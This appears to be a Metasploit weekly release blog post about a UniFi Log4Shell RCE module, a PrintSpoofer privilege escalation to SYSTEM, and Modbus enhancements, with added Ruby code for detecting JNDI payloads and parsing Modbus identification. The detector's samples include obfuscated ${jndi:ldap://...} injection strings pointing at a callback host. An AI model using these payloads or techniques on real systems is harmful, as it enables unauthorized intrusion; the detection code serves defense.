For those wondering when the Log4Shell remediation nightmare will end, I'm afraid I can't give you that. What I can give you, though, is a new Log4Shell module! With the new module from zeroSteiner you can expect to get unauthenticated RCE on the Ubiquiti UniFi Controller Application via a POST request to the /api/login page. Be sure to leverage the module's check function: the JNDI payload travels in the request body rather than in a header, so scanners that only test for header injection may miss this one.
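To make the body-versus-header point concrete, here is an added example (written for this page, not code from the Metasploit module) that inspects a UniFi-style JSON login body, collapses the usual Log4j lookup obfuscations (${lower:…}, ${upper:…} and the ${…:-default} form) and flags any field whose normalized value still contains a ${jndi:…} lookup. The JSON bodies and the 203.0.113.5 callback address are constructed sample data, and the normalizer is a heuristic that covers the common tricks rather than every Log4j lookup type.

```ruby
require 'json'

# Matches the innermost ${...} lookup (a body with no nested braces).
INNERMOST_LOOKUP = /\$\{([^{}]*)\}/

# Evaluate one innermost lookup body the way Log4j 2 would for the common
# obfuscation tricks. Returns nil for a jndi: lookup so that it is preserved.
def resolve_lookup(body)
  return nil if body.downcase.start_with?('jndi:')

  prefix, rest = body.split(':', 2)
  case prefix.to_s.downcase
  when 'lower' then rest.to_s.downcase
  when 'upper' then rest.to_s.upcase
  else
    # ${::-j}, ${env:UNSET:-j}, ${sys:nope:-j}: an unresolvable key yields its default
    body.include?(':-') ? body.split(':-', 2)[1] : ''
  end
end

# Repeatedly collapse innermost lookups until only a jndi: lookup (or nothing) is left.
# Each pass removes at least one ${...}, so the loop converges; 50 is a safety cap.
def normalize_lookups(value)
  out = value.dup
  50.times do
    changed = false
    out = out.gsub(INNERMOST_LOOKUP) do
      resolved = resolve_lookup(Regexp.last_match(1))
      if resolved.nil?
        Regexp.last_match(0) # keep ${jndi:...} as-is
      else
        changed = true
        resolved
      end
    end
    break unless changed
  end
  out.downcase
end

def jndi_lookup?(value)
  normalize_lookups(value).include?('${jndi:')
end

# Walk every string in a parsed JSON document, yielding [json_path, value].
def each_string(node, path = '$', &blk)
  case node
  when Hash   then node.each { |k, v| each_string(v, "#{path}.#{k}", &blk) }
  when Array  then node.each_with_index { |v, i| each_string(v, "#{path}[#{i}]", &blk) }
  when String then yield path, node
  end
end

# Returns [[path, normalized_value], ...] for every string field carrying a JNDI lookup.
# Invalid JSON is reported as no findings rather than raising.
def scan_login_body(raw_body)
  doc = JSON.parse(raw_body)
  hits = []
  each_string(doc) do |path, v|
    normalized = normalize_lookups(v)
    hits << [path, normalized] if normalized.include?('${jndi:')
  end
  hits
rescue JSON::ParserError
  []
end

# Constructed sample bodies for POST /api/login (not captured traffic).
BENIGN_LOGIN = '{"username":"admin","password":"hunter2","remember":true}'
PLAIN_LOGIN  = '{"username":"admin","password":"x","remember":"${jndi:ldap://203.0.113.5:1389/o}"}'
OBFUSCATED_LOGIN = '{"username":"admin","password":"x",' \
  '"remember":"${${lower:J}${::-n}${env:NOPE:-d}i:${upper:l}dap://203.0.113.5:1389/o}"}'

if __FILE__ == $PROGRAM_NAME
  [BENIGN_LOGIN, PLAIN_LOGIN, OBFUSCATED_LOGIN].each do |body|
    puts "#{body}\n  -> #{scan_login_body(body).inspect}"
  end
end
```

Run it and the obfuscated body is reported as `$.remember` carrying `${jndi:ldap://203.0.113.5:1389/o}`, exactly the kind of request a header-only scanner never looks at; the same walker can be pointed at any other JSON field a WAF or proxy logs.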
smashery has done an amazing job giving us a fifth getsystem technique in the Windows Meterpreter. This newest addition ports Clément Labro's PrintSpoofer technique to Metasploit. It gains SYSTEM privileges from the LOCAL SERVICE and NETWORK SERVICE accounts by abusing the SeImpersonatePrivilege privilege. Like the other getsystem techniques, this attack takes place entirely in memory, without any additional configuration, on both 32-bit and 64-bit versions of Windows. It has been tested successfully on Windows 8.1 / Server 2016 and later. Unlike some of the other getsystem techniques, this one has the added advantage of not starting any services, an action that is often flagged as malicious. Users can run this elevation technique directly with the getsystem -t 5 command in Meterpreter. Exploits that yield sessions with LOCAL SERVICE or NETWORK SERVICE privileges can now easily be upgraded to full SYSTEM-level privileges.
New module content:

- root level code execution.
- The UniFi Log4Shell module injects its JNDI payload through the remember field of a POST request to the /api/login page. Successful exploitation results in OS command execution in the context of the server application.

Enhancements and features:

- A fifth getsystem option that uses SeImpersonatePrivilege to gain SYSTEM privileges via the Print Spooler primitive on Windows. It is the Framework side of <https://github.com/rapid7/metasploit-payloads/pull/509>.
- The auxiliary/scanner/scada/modbusclient module has been enhanced to support function code 0x2B (Encapsulated Interface Transport, used here for Read Device Identification), which returns clear-text identification strings for a device. The module's code has also been updated to comply with RuboCop standards.
- A user_data_directory setting has been added to lib/msf/base/config.rb so that users with private Metasploit modules can keep module resources organized the same way MSF does for core modules, while keeping their ~/.msf4 directory portable between installs.
- The ReverseListenerComm and ListenerComm datastore options now accept -1 to refer to the most recently created session, so you no longer have to remember the session ID or change it each time a new session is created.

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).
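For the modbusclient enhancement listed above, here is an added example (not the module's own code) of what a 0x2B / MEI 0x0E Read Device Identification exchange looks like on the wire: a request builder that emits the MBAP header plus PDU, and a parser that handles both a normal response, where vendor name, product code and revision come back as plain ASCII, and a Modbus exception response. The device strings ("Acme PLC", "PLC-200", "v2.1") and the response frame are constructed here; no real PLC was queried.

```ruby
# Modbus/TCP Read Device Identification (function 0x2B, MEI type 0x0E):
# request builder and response parser. Added example, not the module's code.
MODBUS_FC_MEI      = 0x2B # Encapsulated Interface Transport
MEI_READ_DEVICE_ID = 0x0E
READ_BASIC         = 0x01 # basic identification: objects 0x00..0x02

BASIC_OBJECTS = { 0x00 => 'VendorName', 0x01 => 'ProductCode', 0x02 => 'MajorMinorRevision' }.freeze

# MBAP header (transaction id, protocol id 0, remaining length, unit id) followed by the PDU.
def build_read_device_id(transaction_id: 1, unit_id: 1, read_code: READ_BASIC, object_id: 0x00)
  pdu  = [MODBUS_FC_MEI, MEI_READ_DEVICE_ID, read_code, object_id].pack('C4')
  mbap = [transaction_id, 0x0000, pdu.bytesize + 1, unit_id].pack('nnnC')
  mbap + pdu
end

# Parse a response frame. Returns { error: code } for a Modbus exception response,
# otherwise the header fields plus a name => value hash of identification objects.
def parse_read_device_id(frame)
  frame = frame.b
  raise ArgumentError, 'frame shorter than MBAP header' if frame.bytesize < 7

  tid, proto, len, unit = frame.unpack('nnnC')
  raise ArgumentError, "unexpected protocol id #{proto}" unless proto.zero?

  pdu = frame[7, len - 1]
  raise ArgumentError, 'truncated frame' if len < 2 || pdu.nil? || pdu.bytesize != len - 1

  fc = pdu.getbyte(0)
  # Exception responses set the high bit of the function code; byte 1 is the exception code.
  return { transaction_id: tid, unit_id: unit, error: pdu.getbyte(1) } if fc == (MODBUS_FC_MEI | 0x80)
  unless fc == MODBUS_FC_MEI && pdu.getbyte(1) == MEI_READ_DEVICE_ID
    raise ArgumentError, format('unexpected function 0x%02X / MEI 0x%02X', fc, pdu.getbyte(1).to_i)
  end

  read_code, conformity, more_follows, next_object, count = pdu[2, 5].unpack('C5')
  raise ArgumentError, 'truncated identification header' if count.nil?

  objects = {}
  offset = 7
  count.times do
    hdr = pdu[offset, 2]
    raise ArgumentError, 'truncated object header' if hdr.nil? || hdr.bytesize < 2
    oid, olen = hdr.unpack('CC')
    value = pdu[offset + 2, olen]
    raise ArgumentError, 'truncated object value' if value.nil? || value.bytesize != olen
    objects[BASIC_OBJECTS.fetch(oid) { format('Object0x%02X', oid) }] = value
    offset += 2 + olen
  end

  { transaction_id: tid, unit_id: unit, read_code: read_code, conformity_level: conformity,
    more_follows: more_follows != 0, next_object_id: next_object, objects: objects }
end

# Constructed response frame standing in for a real device (no PLC was queried).
def sample_response(transaction_id: 1, unit_id: 1)
  objs = [[0x00, 'Acme PLC'], [0x01, 'PLC-200'], [0x02, 'v2.1']]
  body = objs.map { |id, v| [id, v.bytesize].pack('CC') + v }.join
  # fc, MEI, read code, conformity level (basic stream), more follows = 0, next object = 0, count
  pdu  = [MODBUS_FC_MEI, MEI_READ_DEVICE_ID, READ_BASIC, 0x01, 0x00, 0x00, objs.size].pack('C7') + body
  [transaction_id, 0x0000, pdu.bytesize + 1, unit_id].pack('nnnC') + pdu
end

if __FILE__ == $PROGRAM_NAME
  req = build_read_device_id(transaction_id: 7, unit_id: 3)
  puts "request: #{req.unpack1('H*')}"
  puts "parsed:  #{parse_read_device_id(sample_response(transaction_id: 7, unit_id: 3)).inspect}"
end
```

The request is eleven bytes, and because the whole exchange is unauthenticated clear text, the parser above doubles as a reference for what to expect in a packet capture of the module's new command: a sniffer on the same segment reads the same vendor and product strings the module reports.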